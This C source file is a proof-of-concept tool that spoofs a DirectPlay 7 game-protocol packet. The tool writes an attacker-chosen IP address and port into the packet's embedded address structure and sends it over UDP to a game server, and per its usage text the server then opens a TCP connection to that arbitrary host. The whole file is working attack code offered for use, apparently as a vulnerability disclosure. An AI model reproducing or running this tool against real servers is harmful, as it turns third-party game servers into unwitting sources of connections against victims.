/*

by Luigi Auriemma

*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netdb.h>
#endif



#define VER     "0.1"
#define PORT    47624



u_int resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer,
                        *spoof;
    int     sd;
    u_short dport = PORT;
    u_char  dplay7[] =
            "\x34\x00"                          // packet_size (max 4095)
            "\xB0\xFA"                          // dplay7 sign
            "\x00\x00"                          // client family
            "\x00\x00"                          // client TCP port
            "\x00\x00\x00\x00"                  // client IP address
            "\0\0\0\0\0\0\0\0"                  // ??? (ever 0)
            "play"                              // play
            "\x02\x00"                          // ??? (ever 2)
            "\x0E\x00"                          // ??? (ever 14)
            "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0"  // GUID (0 = cool)
            "\x00\x00\x00\x00"                  // ??? (ever 0)
            "\x01\x00\x00\x00";                 // ???


    setbuf(stdout, NULL);

    fputs("\n"
        "DirectPlay 7 for TCP spoofing "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 4) {
        printf("\n"
            "Usage: %s <source> <TCP_sport> <dplay7_server> [port(%d)]\n"
            "\n"
            "This tool sends a packet to a game server that uses the DirectPlay 7 protocol\n"
            "with the effect that the server will do a TCP connection to the host defined\n"
            "by <source> and to its port <TCP_sport>.\n"
            "Due the Directplay 7 protocol, is not needed to spoof the packet because it\n"
            "contains a sockaddr_in structure (source family, IP and port) that is used by\n"
            "the server so we simply fill it with what we want.\n"
            "\n", argv[0], PORT);
        exit(1);
    }

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    spoof = (struct sockaddr_in *)(dplay7 + 4);
    spoof->sin_addr.s_addr = resolv(argv[1]);
    spoof->sin_port        = htons(atoi(argv[2]));
    spoof->sin_family      = AF_INET;

    if(argc > 4) dport = atoi(argv[4]);
    peer.sin_addr.s_addr   = resolv(argv[3]);
    peer.sin_port          = htons(dport);
    peer.sin_family        = AF_INET;

    printf("\nFrom: %s:%hu   (sockaddr_in structure in the packet)\n",
        inet_ntoa(spoof->sin_addr), ntohs(spoof->sin_port));
    printf("To:   %s:%hu\n",
        inet_ntoa(peer.sin_addr), dport);

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();
    if(sendto(sd, dplay7, sizeof(dplay7) - 1, 0, (struct sockaddr *)&peer, sizeof(peer))
      < 0) std_err();
    close(sd);

    fputs("\nPacket sent\n", stdout);
    return(0);
}



u_int resolv(char *host) {
    struct  hostent *hp;
    u_int  host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolve hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u_int *)(hp->h_addr);
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif

